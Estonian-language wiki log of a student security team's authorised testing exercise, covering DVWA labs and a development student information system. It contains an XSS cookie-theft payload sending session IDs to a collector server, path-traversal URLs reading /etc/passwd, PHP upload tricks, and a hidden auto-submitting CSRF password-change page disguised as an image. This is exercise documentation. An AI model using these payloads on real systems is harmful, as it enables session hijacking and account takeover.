this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
Lihtsalt url modifitseerimisega leidsime mittekaitstud lingi:

Õppesoorituste all on võimalik laadida alla kõikide kasutajate õpingukaardid (lihtsalt tuleb otsida üles soovitud kasutaja student_id)
Arvete alt peaks ka võimalik sama viga ära kasutada, aga kuna ühtegi arvet hetkel süsteemis polnud ei olnud võimalik seda viga kinnitada.

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
===Burp suite===

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

==Nessuse algkäivitamine==
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Tegijad ==
Alo Konno<br>
Urmo Lihten<br>
Taavi Podžuks<br>
Matis Alliksoo<br>
Sander Saarm

Security team

2012-03-30T09:28:17Z

Ulihten: /* Security Team tegevusplaan */

== 1. päev - Materjalidga tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]]

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev<br>
1.1 Tutvuda OWASP’iga. <br>
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.<br>
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.<br>
2. Päev<br>
2.1 Esitada tiimi tegevusplaan.<br>
2.2 Tutvuda turvariskidega natuke põhjalikumalt.<br>
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.<br>
2.4 Täiendada esimese päeva ettekannet.<br>
3. Päev<br>
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.<br>
3.2 Saadud tulemuste dokumenteerimine.<br>
4. Päev<br>
4.1 Saadud tulemuste esitlemine ettekandega<br>
5. Päev<br>
5.1 Tulemuste parandamine wiki’s.<br>

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

